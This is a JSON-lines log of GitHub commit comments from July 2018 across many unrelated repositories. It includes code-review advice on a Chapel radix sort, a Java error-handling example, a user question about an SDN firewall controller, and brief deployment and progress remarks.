{"id":"8005343015","type":"CommitCommentEvent","actor":{"login":"ian-bertolacci"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803429,"position":19,"line":19,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:29:58Z","updated_at":"2018-07-23T17:29:58Z","author_association":"NONE","body":"This is unnecessary (and possibly confusing).\r\nThe `i` in the for-loop below is actually a *different* variable than this `i`. This is known as [variable shadowing](https://en.wikipedia.org/wiki/Variable_shadowing).\r\nAlso, the loop `i` will be assigned from the range in the loop, so you don't need to assign it ahead of time (like in C)."}},"created_at":"2018-07-23T17:29:58Z"}
{"id":"8005349362","type":"CommitCommentEvent","actor":{"login":"ArnavSood"},"repo":{"name":"econtoolkit/tutorials"},"payload":{"comment":{"id":29803433,"position":null,"line":null,"path":null,"commit_id":"a98ebe06a989e7b12be1b4e020e462b5b10707cc","created_at":"2018-07-23T17:31:08Z","updated_at":"2018-07-23T17:31:08Z","author_association":"COLLABORATOR","body":"Makes sense. I think this is roughly identical for v0.7, except `JULIA_HOME` is renamed to `Sys.BINDIR`. (The good thing about getting Expectations registered, is that now it's been grandfathered into the General registry or whatever it's called). \r\n\r\nWill test this stuff and report back. "}},"created_at":"2018-07-23T17:31:08Z"}
{"id":"8005351011","type":"CommitCommentEvent","actor":{"login":"yumetodo"},"repo":{"name":"cpprefjp/site"},"payload":{"comment":{"id":29803436,"position":null,"line":null,"path":null,"commit_id":"c599935ba28c9c4e4dd3de7bbd06674185bfeccb","created_at":"2018-07-23T17:31:26Z","updated_at":"2018-07-23T17:31:26Z","author_association":"MEMBER","body":"ref\r\n- #522 "}},"created_at":"2018-07-23T17:31:26Z"}
{"id":"8005351576","type":"CommitCommentEvent","actor":{"login":"yumetodo"},"repo":{"name":"cpprefjp/site"},"payload":{"comment":{"id":29803439,"position":null,"line":null,"path":null,"commit_id":"41fc139a87133aae2b096c66e0b0213644109a3a","created_at":"2018-07-23T17:31:33Z","updated_at":"2018-07-23T17:31:33Z","author_association":"MEMBER","body":"ref\r\n- #522 "}},"created_at":"2018-07-23T17:31:33Z"}
{"id":"8005354674","type":"CommitCommentEvent","actor":{"login":"gforce2k5"},"repo":{"name":"gforce2k5/minesweeper"},"payload":{"comment":{"id":29803442,"position":null,"line":null,"path":null,"commit_id":"7d3f41da5b4c353f9a15b1f0ecc977df0649f5aa","created_at":"2018-07-23T17:32:10Z","updated_at":"2018-07-23T17:32:10Z","author_association":"OWNER","body":"Closes #6 "}},"created_at":"2018-07-23T17:32:10Z"}
{"id":"8005357034","type":"CommitCommentEvent","actor":{"login":"MichaelB7"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29803446,"position":null,"line":null,"path":null,"commit_id":"0b19dfd3c62937f82f5bd52f57f198300a12052c","created_at":"2018-07-23T17:32:36Z","updated_at":"2018-07-23T17:32:36Z","author_association":"NONE","body":"Nice !!  👍👊"}},"created_at":"2018-07-23T17:32:36Z"}
{"id":"8005359856","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29803456,"position":null,"line":null,"path":null,"commit_id":"d011a5c80cf2f19e8943a2602571f8280f1dc45a","created_at":"2018-07-23T17:33:11Z","updated_at":"2018-07-23T17:33:11Z","author_association":"OWNER","body":"commit index"}},"created_at":"2018-07-23T17:33:11Z"}
{"id":"8005361928","type":"CommitCommentEvent","actor":{"login":"amosonn"},"repo":{"name":"circleofcircles/circleofcircles"},"payload":{"comment":{"id":29803463,"position":9,"line":9,"path":"Singularity/singul_gap.md","commit_id":"8d025d4c3f80650ad8ec2b842d606fb0757548f5","created_at":"2018-07-23T17:33:37Z","updated_at":"2018-07-23T17:33:37Z","author_association":"CONTRIBUTOR","body":"לצבוט את עצמכם *שוב"}},"created_at":"2018-07-23T17:33:37Z"}
{"id":"8005362468","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29803464,"position":null,"line":null,"path":null,"commit_id":"d011a5c80cf2f19e8943a2602571f8280f1dc45a","created_at":"2018-07-23T17:33:43Z","updated_at":"2018-07-23T17:33:43Z","author_association":"OWNER","body":"commit korektura"}},"created_at":"2018-07-23T17:33:43Z"}
{"id":"8005365890","type":"CommitCommentEvent","actor":{"login":"NycuRO"},"repo":{"name":"RevivalPMMP/PureEntitiesX"},"payload":{"comment":{"id":29803474,"position":20,"line":59,"path":"src/revivalpmmp/pureentities/entity/monster/walking/Zombie.php","commit_id":"e418a575919ca0eff4cb39dc89d9c044228996f3","created_at":"2018-07-23T17:34:22Z","updated_at":"2018-07-23T17:34:22Z","author_association":"NONE","body":"reformat"}},"created_at":"2018-07-23T17:34:22Z"}
{"id":"8005366119","type":"CommitCommentEvent","actor":{"login":"KairoWageh"},"repo":{"name":"KairoWageh/AndroidApps"},"payload":{"comment":{"id":29803476,"position":null,"line":null,"path":null,"commit_id":"6c14ffc2280f0d2c22c0544e7be50b073d41fc8d","created_at":"2018-07-23T17:34:25Z","updated_at":"2018-07-23T17:34:25Z","author_association":"OWNER","body":"A to-do list to add your tasks to it.\r\nYou can edit by clicking on the task to open an edit activity.\r\nYou can delete by swiping."}},"created_at":"2018-07-23T17:34:25Z"}
{"id":"8005367950","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29803480,"position":null,"line":null,"path":null,"commit_id":"d011a5c80cf2f19e8943a2602571f8280f1dc45a","created_at":"2018-07-23T17:34:43Z","updated_at":"2018-07-23T17:34:43Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-23T17:34:43Z"}
{"id":"8005368301","type":"CommitCommentEvent","actor":{"login":"LouisJenkinsCS"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803482,"position":68,"line":68,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:34:48Z","updated_at":"2018-07-23T17:34:48Z","author_association":"NONE","body":"I'd suggest that once you know for sure that this works (not assuming whether it does right now) that you use [`fillRandom`](https://chapel-lang.org/docs/primers/randomNumbers.html?highlight=fillrandom#using-fillrandom) on a much larger array and sort that. You can then use [`isSorted`](https://chapel-lang.org/docs/modules/packages/Sort.html#Sort.isSorted) to determine whether or not its sorted, and [`Timers`](https://chapel-lang.org/docs/primers/timers.html) to start seeing how fast this can run.\r\n"}},"created_at":"2018-07-23T17:34:48Z"}
{"id":"8005369563","type":"CommitCommentEvent","actor":{"login":"doktok"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29803487,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T17:35:03Z","updated_at":"2018-07-23T17:35:03Z","author_association":"NONE","body":"god proejkt"}},"created_at":"2018-07-23T17:35:03Z"}
{"id":"8005370850","type":"CommitCommentEvent","actor":{"login":"trvrb"},"repo":{"name":"nextstrain/augur"},"payload":{"comment":{"id":29803489,"position":5,"line":51,"path":"builds/flu/flu_info.py","commit_id":"462d6e1e16a9fd1de8344b187bff29cdccea4e4c","created_at":"2018-07-23T17:35:18Z","updated_at":"2018-07-23T17:35:18Z","author_association":"MEMBER","body":"You need a comma here @barneypotter24."}},"created_at":"2018-07-23T17:35:18Z"}
{"id":"8005376741","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29803499,"position":null,"line":null,"path":null,"commit_id":"b52d95322536b6a92f59cd3b677c80ff18c20b20","created_at":"2018-07-23T17:36:25Z","updated_at":"2018-07-23T17:36:25Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-261](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-261).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-261-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T17:36:25Z"}
{"id":"8005378243","type":"CommitCommentEvent","actor":{"login":"amosonn"},"repo":{"name":"circleofcircles/circleofcircles"},"payload":{"comment":{"id":29803500,"position":null,"line":null,"path":null,"commit_id":"8d025d4c3f80650ad8ec2b842d606fb0757548f5","created_at":"2018-07-23T17:36:43Z","updated_at":"2018-07-23T17:36:43Z","author_association":"CONTRIBUTOR","body":"הייתי מוסיף אולי משהו על הקלטים השונים. כלומר הסיבה שהזיכרון מרגיש אחרת מהחוויה היא שהוא מגיע ממקום אחר. אפשר גם להוסיף משהו לגבי פלאשבאקים, שלפחות לכאורה הם מקרים שבהם הזכרון מרגיש יותר קרוב לחוויה המקורית. או זכרונות של רגשות, שגם הם בד\"כ יותר קרובים למקור מאשר זכרונות של דברים חיצוניים - שוב, בגלל שפה ההבדל במקור הקלט פחות גדול, גם בחוויה המקורית הרגש הוא משהו שנוצר \"בפנים\"."}},"created_at":"2018-07-23T17:36:43Z"}
{"id":"8005380111","type":"CommitCommentEvent","actor":{"login":"ian-bertolacci"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803508,"position":28,"line":28,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:37:07Z","updated_at":"2018-07-23T17:37:07Z","author_association":"NONE","body":"What you are trying to do here can be accomplished with a reversed range:\r\n```chpl\r\nfor i in a.domain by -1 {\r\n  writeln( i );\r\n}\r\n```\r\n\r\nBreaking this down, `a.domain` gives us the domain of the array `a`. The operator `by` works on both ranges and domains, and tells it how much 'distance' to add between each iteration. For example `1..10 by 1` is identical to `1..10` (since they both step by 1); `1..10 by 2` is the sequence 1,3,5,7,9; `1..10 by -1` is the sequence 10, 9, 8, 7, 6, 5, 4, 3, 2, 1; and `1..10 by -2` is the sequence 10, 8, 6, 4, 2.\r\n\r\nPut together this will iterate over the indices in the array `a` but in reverse order."}},"created_at":"2018-07-23T17:37:07Z"}
{"id":"8005381945","type":"CommitCommentEvent","actor":{"login":"RobertWWong"},"repo":{"name":"RobertWWong/42_fillit"},"payload":{"comment":{"id":29803512,"position":90,"line":26,"path":"srcs/ft_fillit.c","commit_id":"afba0e4931ae6c182ca3474b8b944bb5a2336089","created_at":"2018-07-23T17:37:29Z","updated_at":"2018-07-23T17:37:29Z","author_association":"OWNER","body":"I needed this function here.\r\n"}},"created_at":"2018-07-23T17:37:29Z"}
{"id":"8005382551","type":"CommitCommentEvent","actor":{"login":"innakorina"},"repo":{"name":"innakorina/Options_prices"},"payload":{"comment":{"id":29803514,"position":null,"line":null,"path":null,"commit_id":"4ffdb2072c7f357dd3cce3a84a5b0e7f880eafed","created_at":"2018-07-23T17:37:36Z","updated_at":"2018-07-23T17:37:36Z","author_association":"OWNER","body":"Comparing real data from Amazon Options trades on 10-01-2015 and predicted data using brnn model"}},"created_at":"2018-07-23T17:37:36Z"}
{"id":"8005388619","type":"CommitCommentEvent","actor":{"login":"innakorina"},"repo":{"name":"innakorina/Options_prices"},"payload":{"comment":{"id":29803526,"position":null,"line":null,"path":null,"commit_id":"4ffdb2072c7f357dd3cce3a84a5b0e7f880eafed","created_at":"2018-07-23T17:38:46Z","updated_at":"2018-07-23T17:38:46Z","author_association":"OWNER","body":"Displaying AMZN options prices for the day of 10-01-2015"}},"created_at":"2018-07-23T17:38:46Z"}
{"id":"8005388733","type":"CommitCommentEvent","actor":{"login":"ian-bertolacci"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803527,"position":8,"line":8,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:38:47Z","updated_at":"2018-07-23T17:38:47Z","author_association":"NONE","body":"For some of the reasons below, I recomend removing this variable, as it is both unnecessary, and possibly confusing."}},"created_at":"2018-07-23T17:38:47Z"}
{"id":"8005391880","type":"CommitCommentEvent","actor":{"login":"mciul"},"repo":{"name":"i7/kerkerkruip"},"payload":{"comment":{"id":29803536,"position":null,"line":null,"path":null,"commit_id":"d15ccc0101006539a11c0f2f422f9d3dfcff5cce","created_at":"2018-07-23T17:39:25Z","updated_at":"2018-07-23T17:39:25Z","author_association":"CONTRIBUTOR","body":"I noticed a new test failing because the text \"(which breaks your concentration)\" is missing (when Nomos punishes you for attacking with an unloaded weapon). Do you want me to check that out? And if I do, do you want concentration to be broken silently sometimes? Should divine damage not break concentration?"}},"created_at":"2018-07-23T17:39:25Z"}
{"id":"8005396403","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29803548,"position":1,"line":1,"path":"src/sha1hmac.h","commit_id":"dabd67afa7be03e04deb4f0885b818dad37dbfe8","created_at":"2018-07-23T17:40:17Z","updated_at":"2018-07-23T17:40:17Z","author_association":"MEMBER","body":"This one is still there. See: \r\n<img width=\"1085\" alt=\"screen shot 2018-07-23 at 7 40 00 pm\" src=\"https://user-images.githubusercontent.com/8270508/43093398-3687b9f0-8eb0-11e8-925f-43e7f8331a4e.png\">\r\n"}},"created_at":"2018-07-23T17:40:17Z"}
{"id":"8005396725","type":"CommitCommentEvent","actor":{"login":"aphillips"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29803549,"position":23,"line":1365,"path":"index.html","commit_id":"b359ebb35ebe28ecf8f083702648b5c22ada010f","created_at":"2018-07-23T17:40:21Z","updated_at":"2018-07-23T17:40:21Z","author_association":"OWNER","body":"fixed"}},"created_at":"2018-07-23T17:40:21Z"}
{"id":"8005398627","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29803552,"position":1,"line":1,"path":"src/sha1mac.c","commit_id":"dabd67afa7be03e04deb4f0885b818dad37dbfe8","created_at":"2018-07-23T17:40:43Z","updated_at":"2018-07-23T17:40:43Z","author_association":"MEMBER","body":"This one is still there. See:\r\n<img width=\"1085\" alt=\"screen shot 2018-07-23 at 7 40 00 pm\" src=\"https://user-images.githubusercontent.com/8270508/43093425-480dcc28-8eb0-11e8-956b-35ff933150ee.png\">\r\n"}},"created_at":"2018-07-23T17:40:43Z"}
{"id":"8005398963","type":"CommitCommentEvent","actor":{"login":"Makman2"},"repo":{"name":"coala/coala"},"payload":{"comment":{"id":29803554,"position":33,"line":290,"path":"coalib/bears/Bear.py","commit_id":"25b6b4c94880d28a6cfe469de09e37baf1c0ea42","created_at":"2018-07-23T17:40:46Z","updated_at":"2018-07-23T17:40:46Z","author_association":"MEMBER","body":"-->\r\nInvalid arguments passed, can't run debugger and profiler at the same time."}},"created_at":"2018-07-23T17:40:46Z"}
{"id":"8005400434","type":"CommitCommentEvent","actor":{"login":"ian-bertolacci"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803558,"position":12,"line":12,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:41:03Z","updated_at":"2018-07-23T17:41:03Z","author_association":"NONE","body":"Alternatively, if using the indexes is necessary or preferred, you can do `for i in array.domain` which will always iterate over valid indices in the array. This is preferable to the current implementation, because if the domain of `a` was changed to not be `1..N` then this loop would become invalid, where as `for i in array.domain` would *always* be valid."}},"created_at":"2018-07-23T17:41:03Z"}
{"id":"8005401241","type":"CommitCommentEvent","actor":{"login":"Bungeebones"},"repo":{"name":"simpleledger/simple-ledger-protocol"},"payload":{"comment":{"id":29803559,"position":null,"line":null,"path":null,"commit_id":"08fa657c9ec18b87c59878bf7e82f61434551cd7","created_at":"2018-07-23T17:41:13Z","updated_at":"2018-07-23T17:41:13Z","author_association":"NONE","body":"Hi, I'm working on something that parallels this project in many ways. It is a Bitcoin Cash ad network (like Google's Adsense/Adwords but NOT pay per Click). Designed to provide the contributors and producers of web traffic with an ownership \"stake\" in the growth that their web traffic leads to, a core issue is how/when/where etc to separate the \"centralized\" and 'decentralized' issues. \r\n\r\nPart of the issue is software related but I also believe part of the issue may be the business structure or 'container' or business model. I have settled on a rather rare business model known as \"The Massachusetts Business Trust\" which is a product of contract, common law, and fiduciary responsibilities to the members/beneficiaries rather  than a product of statues, permission and subservience to the state for the benefit of \"stockholders\". \r\n\r\nI've been doing all my own programming. Have a working model that had 3000 users at a 'centralised' level. I'm working to de-centralise that a bit by the creation of an \"enterprise level\" that enables professionals such as web designers, developers, hosting companies, SEO companies and Internet marketing firms to operate their own nodes in an almost peer-to-peer fashion. \r\n\r\nThat's what I am developing right now and where I see your work fitting with it. I've signed up to \"watch\" and would like to help. \r\n\r\nHere is a thought before I go ... along the lines of \"smart contracts\". Basic Law Of Contracts states the parts of a contract that must be present include 1) offer, 2) acceptance 3) performance 4) consideration. The problem with \"smart\" contracts is the idea that \"the contract is in the code\" which flies in the face of another prerequisite of contracts that there be \"a meeting of the minds\" (achieved through steps 1 & 2). Few can read code and therefore they cannot achieve such a meeting of the minds. There must be a larger, more authoritive (sic. than the code) version of the contract in lay terms that the parties can understand. What I've settled on is a Wiki where the goals of the code, the operation of the code, the \"bugs\" of the code, the performance of the code etc. are reported on by all the various stakeholders to the contract (i.e. the developers, the site administration, the end users etc.). Put another way, I'm developing the concepts of my business saying \"The contract is in the Wiki\" rather than that it is \"in the code'.\r\n\r\nPlease keep in touch. I believe you are miles ahead of me in development but am willing to contribute what I can. I'm a PHP/Mysql guy with some work in the Bitcoin blockchain a few years ago. I've done a little bit with Nodejs also.\r\n\r\nCheers!"}},"created_at":"2018-07-23T17:41:13Z"}
{"id":"8005401887","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29803560,"position":null,"line":null,"path":null,"commit_id":"7c8f2ba221a55d6d0e56a96eccadac9cf284dca7","created_at":"2018-07-23T17:41:20Z","updated_at":"2018-07-23T17:41:20Z","author_association":"OWNER","body":"Collision 264.20.1~264.30.2"}},"created_at":"2018-07-23T17:41:20Z"}
{"id":"8005402871","type":"CommitCommentEvent","actor":{"login":"jb0gie"},"repo":{"name":"kinecosystem/kin-app-server"},"payload":{"comment":{"id":29803561,"position":null,"line":null,"path":null,"commit_id":"f2e64898dfd40c3ed131bb854d2632152998b646","created_at":"2018-07-23T17:41:32Z","updated_at":"2018-07-23T17:41:32Z","author_association":"NONE","body":"🤣"}},"created_at":"2018-07-23T17:41:32Z"}
{"id":"8005403288","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29803565,"position":null,"line":null,"path":null,"commit_id":"5f1d36923877fa0ff60a754efa7dde672a178e73","created_at":"2018-07-23T17:41:37Z","updated_at":"2018-07-23T17:41:37Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-261](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-261).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-261-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T17:41:37Z"}
{"id":"8005403558","type":"CommitCommentEvent","actor":{"login":"stripes416"},"repo":{"name":"csravelar/IA-Hardware-Composer"},"payload":{"comment":{"id":29803567,"position":null,"line":null,"path":null,"commit_id":"ba62a7b55b27276da98079ffa69c08ef6f54ee3f","created_at":"2018-07-23T17:41:40Z","updated_at":"2018-07-23T17:41:40Z","author_association":"NONE","body":"I like the method example -- should we also include a class example?"}},"created_at":"2018-07-23T17:41:40Z"}
{"id":"8005405593","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29803573,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-23T17:42:06Z","updated_at":"2018-07-23T17:42:06Z","author_association":"OWNER","body":"> Because either of the above suggest that if an exception occurs, but just happens to be some random error that isn't specifically mentioned, then do continue loading the plugin... which would lead to further errors.\r\n\r\nWell ideally you'd decide here whats going wrong and either skip as much data as neccessary or completly stop loading (and disable the plugin). Also the code I suggested means that if another exception occurs, it'll fail horribly. And it should do that, because anything thats not obviously thrown by the code in question requires you to completly stop anyway. An example would be an OutOfMemoryException.\r\n\r\nLazer is correct, ideally you output whats actually wrong, you HANDLE the exception and say \"hey this identifier DAIMOND_HOE could not be parsed, I ignored\", but stil keep parsing the other stuff. The user doesnt have to know or care that this threw an IAE in the background and ideally he finds never out.\r\n\r\n\r\nProper error handling could for example look like this\r\n\r\n```\r\n        if (!setup.isList(\"items\")) {\r\n            log(\"Section \" + setup.getCurrentPath() + \" had no item section specified, skipping it\");\r\n            continue;\r\n        }\r\n        List<Material> setupMaterials = new ArrayList<>();\r\n        for (String materialName : setup.getStringList(items)) {\r\n            try {\r\n                Material m = Material.valueOf(materialName);\r\n            }\r\n            catch (IllegalArgumentException e) {\r\n                log(\"Section \" + setup.getCurrentPath() + \" contained the invalid item \" + materialName + \", the item was skipped\");\r\n            }\r\n        }\r\n        if (setupMaterials.isEmpty()) {\r\n            log(\"Section \" + setup.getCurrentPath() + \" had no items specified in its item list, skipping it\");\r\n            continue;\r\n        }\r\n```\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-23T17:42:06Z"}
{"id":"8005410690","type":"CommitCommentEvent","actor":{"login":"JustinJohnsonK"},"repo":{"name":"JustinJohnsonK/throw-emoji"},"payload":{"comment":{"id":29803579,"position":null,"line":null,"path":null,"commit_id":"85fab6131c410323c38a11e800fdb159b0f7c8cd","created_at":"2018-07-23T17:43:06Z","updated_at":"2018-07-23T17:43:06Z","author_association":"OWNER","body":"pycache removed."}},"created_at":"2018-07-23T17:43:06Z"}
{"id":"8005413034","type":"CommitCommentEvent","actor":{"login":"wabernatScality"},"repo":{"name":"scality/Zenko"},"payload":{"comment":{"id":29803581,"position":null,"line":null,"path":null,"commit_id":"c84ff6b03af68562829776056baf059b4c313f7d","created_at":"2018-07-23T17:43:33Z","updated_at":"2018-07-23T17:43:33Z","author_association":"CONTRIBUTOR","body":"If this was an error, roll it back. I was just trying to bring myself up to current. Perhaps I should have rebased? "}},"created_at":"2018-07-23T17:43:33Z"}
{"id":"8005415089","type":"CommitCommentEvent","actor":{"login":"amjadkhan1995"},"repo":{"name":"HanSolo/tilesfx"},"payload":{"comment":{"id":29803584,"position":null,"line":null,"path":null,"commit_id":"37f823d8c77c60915847395d3bd6b096ade949a6","created_at":"2018-07-23T17:43:58Z","updated_at":"2018-07-23T17:43:58Z","author_association":"NONE","body":"hi, hope you're in good health!\r\nhow can i use this library?\r\ni tried everything i could.\r\ni really need help with this."}},"created_at":"2018-07-23T17:43:58Z"}
{"id":"8005415625","type":"CommitCommentEvent","actor":{"login":"DmitryevichD"},"repo":{"name":"DmitryevichD/books"},"payload":{"comment":{"id":29803587,"position":null,"line":null,"path":null,"commit_id":"db574575e3dc5fb6371e438b38b9678ba3ed9ef0","created_at":"2018-07-23T17:44:04Z","updated_at":"2018-07-23T17:44:04Z","author_association":"OWNER","body":"init project"}},"created_at":"2018-07-23T17:44:04Z"}
{"id":"8005416249","type":"CommitCommentEvent","actor":{"login":"julesx"},"repo":{"name":"daishi4u/ForceCode"},"payload":{"comment":{"id":29803588,"position":null,"line":null,"path":null,"commit_id":"d8f19f2d6540f1e83572855d61b6c395686ddf00","created_at":"2018-07-23T17:44:12Z","updated_at":"2018-07-23T17:44:12Z","author_association":"NONE","body":"gogogogo"}},"created_at":"2018-07-23T17:44:12Z"}
{"id":"8005417850","type":"CommitCommentEvent","actor":{"login":"amosonn"},"repo":{"name":"circleofcircles/circleofcircles"},"payload":{"comment":{"id":29803592,"position":9,"line":9,"path":"Singularity/singul_gap.md","commit_id":"8d025d4c3f80650ad8ec2b842d606fb0757548f5","created_at":"2018-07-23T17:44:30Z","updated_at":"2018-07-23T17:44:30Z","author_association":"CONTRIBUTOR","body":"בעצם, אני אתקן את זה לבד :)"}},"created_at":"2018-07-23T17:44:30Z"}
{"id":"8005425196","type":"CommitCommentEvent","actor":{"login":"tongas321"},"repo":{"name":"jms30/SDN_Firewall"},"payload":{"comment":{"id":29803601,"position":null,"line":null,"path":null,"commit_id":"a7d09dc3e466c58fa1e9139bef368861f8bb24a1","created_at":"2018-07-23T17:45:55Z","updated_at":"2018-07-23T17:45:55Z","author_association":"NONE","body":"hi!, thanks for the answer. I have another question for you if this does not bother you.\n\ni have a problem, i am using a OpenFlow Switch (HP 2920), the switch works fine with ryu controller but when i try to use your controller with ryu-manager i can´t add rules, the only rule added is \"drop\" for any packet.\nMy flows tables are in the image.\nAlso i added one image of my configuration (Instance). As you can see my switch has detected the controller but it can´t add rules. And a image of my firewall.txt file.\n\n¿do you have any idea which the problem is?\n\nIn a newer HP switch i can use the controller but in this i can´t.\n\nThank you for your time, grettings from Córdoba, Argentina.\n[cid:b462e37e-2821-4ced-b338-745933f840ac]\n[cid:7026fe57-85cb-4614-91aa-d84c0f22158c]\n[cid:3db8505e-496b-49dd-8074-56286d5f6e13]\n[cid:d94bf811-0dc4-4f5c-9b8f-315714fe9da1]\n[cid:62322943-d019-45f4-8d40-ed617b442265]\n\n\n\n________________________________\nDe: jms30 <notifications@github.com>\nEnviado: sábado, 14 de julio de 2018 12:19\nPara: jms30/SDN_Firewall\nCc: tongas321; Comment\nAsunto: Re: [jms30/SDN_Firewall] Latest code. (a7d09dc)\n\nHi,\n\nSorry for quite late response.\nRegarding your question: No. If you look at the firewall_stateful.txt and\nfirewall_stateless.txt rule files, you could see that one has to configure\nrules per 'individual' bases. The rules need to be specific with a source\nand a destination host, rather than for a whole network.\nHowever, you can definitely enhance the rule logic by re-writing the\nparsing on your own. [Which is anyhow a complete f*cked up code] :)\n\nBest Regards,\nJay\n\nOn 4 June 2018 at 19:53, tongas321 <notifications@github.com> wrote:\n\n> Hello, i have a question, first, you had done a very great work with this\n> firewall, it is very usefull, my question is, can i apply firewall rules\n> for an entire net, for example, allow ICMP messages between my host and\n> entire net 192.168.50.0/24? have i to modify some code?. I am sorry for\n> my english. i hope you understand me.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jms30/SDN_Firewall/commit/a7d09dc3e466c58fa1e9139bef368861f8bb24a1#commitcomment-29237229>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFETP7xyKJXqGNWiQB19fm85aADadP1Vks5t5XQagaJpZM4ESltS>\n> .\n>\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub<https://github.com/jms30/SDN_Firewall/commit/a7d09dc3e466c58fa1e9139bef368861f8bb24a1#commitcomment-29709095>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AIZ57JPp9yekjeRe3p0ERmo3w5fDaCMpks5uGeHogaJpZM4ESltS>.\n"}},"created_at":"2018-07-23T17:45:55Z"}
{"id":"8005425409","type":"CommitCommentEvent","actor":{"login":"jaison8940"},"repo":{"name":"jaison8940/CPP-problems"},"payload":{"comment":{"id":29803602,"position":null,"line":null,"path":null,"commit_id":"9b6a729a8b503210ef3289447f41212b36097dfa","created_at":"2018-07-23T17:45:59Z","updated_at":"2018-07-23T17:45:59Z","author_association":"OWNER","body":"Example: 1\r\nInput: 5 \r\nOutput: \r\n1-2-3---3-2-1 \r\n---5-4-4-5 \r\n------0 \r\n---2-1-1-2 \r\n3-4-5---5-4-3\r\nExample: 2\r\nInput: 3 \r\nOutput: \r\n1-2-2-1\r\n---0 \r\n2-1-1-2"}},"created_at":"2018-07-23T17:45:59Z"}
{"id":"8005426273","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29803604,"position":null,"line":null,"path":null,"commit_id":"0ab683cb19ae6f1d2f1f13a8e94d3bb7b6bfff2f","created_at":"2018-07-23T17:46:09Z","updated_at":"2018-07-23T17:46:09Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [protectedp](https://protectedp-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/private-paths](https://protectedp-static-docs.pantheonsite.io/docs/private-paths)\n"}},"created_at":"2018-07-23T17:46:09Z"}
{"id":"8005426870","type":"CommitCommentEvent","actor":{"login":"DCurrent"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29803606,"position":null,"line":null,"path":null,"commit_id":"e8b8d1cefdf9499c90b3a91354f8ea69bf9d083a","created_at":"2018-07-23T17:46:15Z","updated_at":"2018-07-23T17:46:15Z","author_association":"OWNER","body":"@whitedragon0000 there is an issue with these. Nothing bad, but the model of using global int constants turned out to be a bad idea and I'm not keeping. Consequently the bbox, attack, will be reworked.... and the entity too, and that will break backward compatability if people start using it before I'm done. Please look at my more recent property project to see the current model and follow it instead."}},"created_at":"2018-07-23T17:46:15Z"}
{"id":"8005428630","type":"CommitCommentEvent","actor":{"login":"ben-albrecht"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803609,"position":5,"line":5,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:46:36Z","updated_at":"2018-07-23T17:46:36Z","author_association":"NONE","body":"Since we're using 1-based domain, omitting the count (`#`) operator also works:\r\n\r\n```chpl\r\nvar result : [1..array.size] int;\r\n```"}},"created_at":"2018-07-23T17:46:36Z"}
